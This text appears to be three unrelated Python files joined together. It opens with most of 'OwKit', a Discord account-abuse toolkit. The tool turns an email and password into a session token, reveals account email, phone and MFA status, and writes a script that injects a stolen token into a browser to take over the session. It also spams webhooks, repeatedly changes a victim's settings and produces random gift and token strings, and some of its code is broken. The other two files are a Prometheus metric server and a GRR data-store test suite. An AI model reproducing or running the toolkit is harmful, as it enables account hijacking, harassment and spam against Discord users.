{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
print(f"""
{Fore.MAGENTA}(1){Fore.RESET} Bravery
{Fore.MAGENTA}(2){Fore.RESET} Brilliance
{Fore.MAGENTA}(3){Fore.RESET} Balance
""")
house = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Your choice: ')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
}
if house == "1":
payload = {'house_id': 1}
elif house == "2":
payload = {'house_id': 2}
elif house == "3":
payload = {'house_id': 3}
r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload, timeout=10)
if r.status_code == 204:
print(f"{Fore.GREEN}Successfully changed your token hypesquad{Fore.RESET}")
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def nitrogen():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Nitro Generator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
try:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
value = 1
while value <= amount:
code = "https://discord.gift/" + ('').join(random.choices(string.ascii_letters + string.digits, k=16))
f = open(f'Nitro codes ({amount}).txt', "a+")
f.write(f'{code}\n')
f.close()
print(f'{code}')
value += 1
print('')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokengen():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Generator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
try:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
value = 1
while value <= amount:
code = "Nz" + ('').join(random.choices(string.ascii_letters + string.digits, k=59))
f = open(f'Tokens ({amount}).txt', "a+")
f.write(f'{code}\n')
f.close()
print(f'{code}')
value += 1
print('')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def trolltoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Troll Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
modes = cycle(["light", "dark"])
for i in range(amount):
t = threading.Thread(target=trolltoken, args=(i,))
print(f'{Fore.GREEN}Token has been trolled [{i}]')
time.sleep(0.12)
setting = {'theme': next(modes)}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=headers, json=setting)
print(f'{Fore.GREEN}Finished trolling{Fore.RESET}')
print('Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokeninfo():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Info')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
print(f'{Fore.GREEN}Token is valid.{Fore.RESET}')
userName = r.json()['username'] + '#' + r.json()['discriminator']
userID = r.json()['id']
phone = r.json()['phone']
email = r.json()['email']
mfa = r.json()['mfa_enabled']
verified = r.json()['verified']
print(f'''
User: {userName}
ID: {userID}
Phone: {phone}
Email: {email}
MFA: {mfa}
Verified: {verified}
Token: {token}
''')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
def informations():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Informations & contact')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
fh = open('Information & contact.txt', 'w', encoding='utf-8')
fh.write("""
Discord User: Monster CAT
Github: https://github.com/H23ninezerozerozero
""")
fh.close()
print(f"""
Discord User: Monster CAT
Github: https://github.com/H23ninezerozerozero
""")
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def tokenfetcher():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Get token from email:password')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
email = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Email: ')
password = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Password: ')
data={'email': email, 'password': password, 'undelete': "false"}
headers={'content-type': "application/json", 'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
r = requests.post('https://discord.com/api/v8/auth/login', json=data, headers=headers)
if r.status_code == 200:
token = r.json()['token']
print(f'Token: {token}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
elif "PASSWORD_DOES_NOT_MATCH" in r.text:
print(f'{Fore.RED}Invalid Password{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
elif "captcha-required" in r.text:
print(f'{Fore.RED}Discord returned captcha{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def checkwebhook():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Check Webhook')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
webhook = input(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Webhook: ')
message = ('_ _')
try:
_data = requests.post(webhook, json={'content': message}, headers={'Content-Type': 'application/json'})
if _data.status_code < 400:
print(f'\n{Fore.GREEN}Webhook valid{Fore.RESET}')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
except:
print(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Invalid Webhook')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def spamwebhook():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Spam Webhook')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
webhook = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Webhook: ')
message = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Message: ')
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount:'))
try:
for i in range(amount):
_data = requests.post(webhook, json={'content': message}, headers={'Content-Type': 'application/json'})
if _data.status_code < 400:
print(f'Sent new message [{i}]')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
except:
print(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Invalid Webhook\n')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def tokenlogin():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Informations')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
fh = open('Token Login Script.txt', 'w', encoding='utf-8')
fh.write('''
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}'''
+ login('{token}'))
fh.close()
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
else:
print(f"{Fore.RED}Invalid token{Fore.RESET}")
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def getBanner():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Main Menu')
banner = f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
\u001b[38;5;141m[\u001b[38;5;141m1\u001b[38;5;141m] \u001b[38;5;15mGet token from email:password \u001b[38;5;141m[\u001b[38;5;141m9\u001b[38;5;141m] \u001b[38;5;15mChange Hypesquad house
\u001b[38;5;141m[\u001b[38;5;141m2\u001b[38;5;141m] \u001b[38;5;15mNuke token \u001b[38;5;141m[\u001b[38;5;141m10\u001b[38;5;141m] \u001b[38;5;15mToken validator
\u001b[38;5;141m[\u001b[38;5;141m3\u001b[38;5;141m] \u001b[38;5;15mBan token \u001b[38;5;141m[\u001b[38;5;141m11\u001b[38;5;141m] \u001b[38;5;15mSpam webhook
\u001b[38;5;141m[\u001b[38;5;141m4\u001b[38;5;141m] \u001b[38;5;15mTroll token \u001b[38;5;141m[\u001b[38;5;141m12\u001b[38;5;141m] \u001b[38;5;15mCheck webhook
\u001b[38;5;141m[\u001b[38;5;141m5\u001b[38;5;141m] \u001b[38;5;15mToken informations \u001b[38;5;141m[\u001b[38;5;141m13\u001b[38;5;141m] \u001b[38;5;15mGenerate nitro codes
\u001b[38;5;141m[\u001b[38;5;141m6\u001b[38;5;141m] \u001b[38;5;15mGet token from user id \u001b[38;5;141m[\u001b[38;5;141m14\u001b[38;5;141m] \u001b[38;5;15mGenerate tokens
\u001b[38;5;141m[\u001b[38;5;141m7\u001b[38;5;141m] \u001b[38;5;15mLogin on token \u001b[38;5;141m[\u001b[38;5;141m15\u001b[38;5;141m] \u001b[38;5;15mInformations & contact
\u001b[38;5;141m[\u001b[38;5;141m8\u001b[38;5;141m] \u001b[38;5;15mUnverify token \u001b[38;5;141m[\u001b[38;5;141m0\u001b[38;5;141m] \u001b[38;5;15mExit
'''
return banner
def mainMenu():
print(getBanner())
print(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}', end=''); choice = str(input(' '))
if choice == '1':
tokenfetcher()
elif choice == '2':
nuketoken()
elif choice == '3':
bantoken()
elif choice == '4':
trolltoken()
elif choice == '5':
tokeninfo()
elif choice == '6':
tokenfromuserid()
elif choice == '7':
tokenlogin()
elif choice == '8':
unverifytoken()
elif choice == '9':
hypesquad()
elif choice == '10':
tokenvalidator()
elif choice == '11':
spamwebhook()
elif choice == '12':
checkwebhook()
elif choice == '13':
nitrogen()
elif choice == '14':
tokengen()
elif choice == '0':
exit()
elif choice.isdigit() == False:
mainMenu()
else:
mainMenu()
if __name__ == '__main__':
mainMenu()
|
server.py
|
from prometheus_client import start_http_server, Gauge, Counter, Histogram, Summary
import redis
import json
import logging
import sys
from subprocess32 import call
import psutil
from schema import validate_schema, Prom_Type
from jsonschema import ValidationError
from config import CHANNEL_NAME, DEFAULT_BUCKETS, UNIX_SOCKET_PATH
class Metric:
"""
Metric class abstract away the complexity of dealing with Prometheus
data types.
"""
def __init__(self, name, metric_type, description, buckets):
self.name = name
self.type = metric_type
if metric_type == 'Counter':
self._metric = Counter(name, description)
elif metric_type == 'Gauge':
self._metric = Gauge(name, description)
elif metric_type == 'Histogram':
self._metric = Histogram(name, description, buckets=buckets)
elif metric_type == 'Summary':
self._metric = Summary(name, description)
def report(self, value):
value = float(value)
if self.type == 'Counter':
self._metric.inc(value)
elif self.type == 'Gauge':
self._metric.set(value)
elif self.type == 'Histogram' or self.type == 'Summary':
self._metric.observe(value)
def add_metric(name, metric_type, description, buckets, metric_pool):
metric_pool[name] = Metric(name, metric_type, description, buckets)
def report_metric(name, val, metric_pool):
if name in metric_pool:
metric_pool[name].report(val)
else:
logger = logging.getLogger(__name__)
logger.error("{} not found in metric pool: {}".format(
name, metric_pool.keys()))
def handle_message(message_dict, metric_pool):
"""
Handle a message dictionary, dispatch request to add or report call
"""
endpoint = message_dict['endpoint']
data = message_dict['data']
if endpoint == 'add':
add_metric(data['name'], data['type'], data['description'],
data.get('buckets', DEFAULT_BUCKETS), metric_pool)
elif endpoint == 'report':
report_metric(data['name'], data['data'], metric_pool)
def start_server():
logger = _init_logger()
start_http_server(1390)
logger.info("Metric Server Started!")
r = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
sub = r.pubsub(ignore_subscribe_messages=True)
sub.subscribe(CHANNEL_NAME)
logger.info("Redis Connected! Waiting for messages...")
metric_pool = {}
for message in sub.listen(): # Blocking, will run forever
logger.debug(message)
try:
message_dict = json.loads(message['data'])
validate_schema(message_dict)
handle_message(message_dict, metric_pool)
except (KeyError, ValueError, ValidationError) as e:
# Here, we catch errors in
# (1) message['data'], the redis queue is not sending correct
# message in expected format.
# (2) json.loads, the json string is corrupted.
# (3) validate_schema will throw ValidationError if schema
# validation failed.
#
# Note:
# (2) leads to json ValueError in python2,
# JSONEncoderError in python3
logger.error(e)
def _init_logger():
logging.basicConfig(
filename='/metric_server.log',
format=
'%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
return logger
def start_redis_daemon():
cmd = [
'redis-server', '--unixsocket', '/tmp/redis.sock', '--daemonize', 'yes'
]
call(cmd)
def redis_daemon_exist():
# We can just check of 'redis-server' process because the default
# situation is that we are in a container without any other python2
# process.
pids = psutil.pids()
process_names = [psutil.Process(pid).name() for pid in pids]
return 'redis-server' in process_names
if __name__ == '__main__':
start_redis_daemon()
# This snippet of code spin up a debug server
# that sends the log to 1392. Don't forget to add
# the debug line to container manager as well!
if len(sys.argv) > 1 and sys.argv[-1] == 'DEBUG':
def start_debug_server():
from flask import Flask, send_file, jsonify
app = Flask(__name__)
@app.route('/')
def show_log():
return send_file('/metric_server.log')
app.run(host='0.0.0.0', port=1392)
from multiprocessing import Process
debug_proc = Process(target=start_debug_server)
debug_proc.start()
start_server()
|
data_store_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""These are basic tests for the data store abstraction.
Implementations should be able to pass these tests to be conformant.
"""
import csv
import functools
import hashlib
import inspect
import logging
import operator
import os
import random
import string
import tempfile
import thread
import threading
import time
import mock
from grr.lib import aff4
from grr.lib import data_store
from grr.lib import flow
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import sequential_collection
from grr.lib import test_lib
from grr.lib import threadpool
from grr.lib import worker
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import standard
from grr.lib.flows.general import filesystem
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class StringSequentialCollection(
sequential_collection.IndexedSequentialCollection):
RDF_TYPE = rdfvalue.RDFString
def DeletionTest(f):
"""This indicates a test that uses deletion."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DELETION:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use deletion are disabled "
"for this data store.")
return Decorator
def DBSubjectLockTest(f):
"""This indicates a test that uses locks."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DBSUBJECTLOCKS:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use locks are disabled "
"for this data store.")
return Decorator
class _DataStoreTest(test_lib.GRRBaseTest):
"""Test the data store abstraction.
Note that when testing timestamp behavior the cloud bigtable datastore only
has ms precision.
"""
test_row = "aff4:/row:foo"
lease_row = u"aff4:/leasetest"
# This flag controls if tests can also delete data. Some data stores don't
# support deletion so those tests will fail for them.
TEST_DELETION = True
# The same applies to locks.
TEST_DBSUBJECTLOCKS = True
def _ClearDB(self, subjects):
for subject in subjects:
data_store.DB.DeleteSubject(subject, token=self.token)
data_store.DB.Flush()
def setUp(self):
super(_DataStoreTest, self).setUp()
self.InitDatastore()
to_delete = ["aff4:/row:%s" % i for i in range(20)]
to_delete.extend(["aff4:/C/%s" % i for i in range(7)])
to_delete.extend(
[self.test_row, self.lease_row, "aff4:/A/", "aff4:/B/", "aff4:/C/"])
self._ClearDB(to_delete)
self.acls_installed = False
def tearDown(self):
super(_DataStoreTest, self).tearDown()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def _TruncateToMilliseconds(self, timestamp_int):
timestamp_int -= (timestamp_int % 1000)
return timestamp_int
def testSetResolve(self):
"""Test the Set() and Resolve() methods."""
predicate = "task:00000001"
value = rdf_flows.GrrMessage(session_id="session")
# Ensure that setting a value is immediately available.
data_store.DB.Set(self.test_row, predicate, value, token=self.token)
time.sleep(1)
data_store.DB.Set(self.test_row + "X", predicate, value, token=self.token)
stored_proto, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
stored_proto = rdf_flows.GrrMessage.FromSerializedString(stored_proto)
self.assertEqual(stored_proto.session_id, value.session_id)
def testMultiSet(self):
"""Test the MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSetTimestamps(self):
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, 1000)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetNoneTimestampIsNow(self):
unicode_string = u"this is a uñîcödé string"
start_time = time.time() * 1e6
# Test None timestamp is translated to current time.
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, None)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
end_time = time.time() * 1e6
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertGreaterEqual(ts, start_time)
self.assertLessEqual(ts, end_time)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetAsync(self):
"""Test the async MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [3],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
sync=False,
token=self.token)
# Force the flusher thread to flush.
data_store.DB.flusher_thread.target()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 3)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSet2(self):
"""Test the MultiSet() methods."""
# Specify a per element timestamp
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)],
"aff4:stored": [("2", 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
self.assertEqual(ts, 2000)
def testMultiSet3(self):
"""Test the MultiSet() delete methods."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": ["2"]},
to_delete=["aff4:size"],
token=self.token)
# This should be gone now
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
def testMultiSet4(self):
"""Test the MultiSet() delete methods when deleting the same predicate."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [4]},
to_delete=["aff4:size"],
token=self.token)
# This should only produce a single result
count = 0
for count, (predicate, value, _) in enumerate(
data_store.DB.ResolvePrefix(
self.test_row,
"aff4:size",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)):
self.assertEqual(value, 4)
self.assertEqual(predicate, "aff4:size")
self.assertEqual(count, 0)
def testMultiSetSetsTimestapWhenReplacing(self):
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)]},
replace=True,
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
def testMultiSetRemovesOtherValuesWhenReplacing(self):
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("2", 1000), ("3", 4000)]},
replace=False,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertListEqual(values, [("aff4:stored", "3", 4000), ("aff4:stored",
"2", 1000)])
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("4", 3000)]},
replace=True,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertListEqual(values, [("aff4:stored", "4", 3000)])
@DeletionTest
def testDeleteAttributes(self):
"""Test we can delete an attribute."""
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
data_store.DB.DeleteAttributes(
self.test_row, [predicate], sync=True, token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
@DeletionTest
def testMultiDeleteAttributes(self):
"""Test we can delete multiple attributes at once."""
test_rows = ["aff4:/row/%i" % i for i in range(0, 10)]
predicate_1 = "metadata:predicate1"
predicate_2 = "metadata:predicate2"
for row in test_rows:
data_store.DB.Set(row, predicate_1, "hello", token=self.token)
data_store.DB.Set(row, predicate_2, "hello", token=self.token)
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
data_store.DB.MultiDeleteAttributes(
test_rows, [predicate_1, predicate_2], token=self.token)
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
def CheckLength(self, predicate, l):
all_attributes = data_store.DB.ResolveMulti(
self.test_row, [predicate], timestamp=(0, 5000), token=self.token)
self.assertEqual(len(list(all_attributes)), l)
def CheckLast(self, predicate, expected_value, exptected_ts):
stored, ts = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, expected_value)
self.assertEqual(ts, exptected_ts)
@DeletionTest
def testDeleteAttributesTimestamps(self):
"""Test we can delete an attribute in a time range."""
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello2000",
timestamp=2000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello3000",
timestamp=3000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello4000",
timestamp=4000,
replace=False,
token=self.token)
# Check its there
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 4)
# Delete timestamps between 0 and 1500.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=1500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 3)
# Delete timestamps between 3000 and 4500.
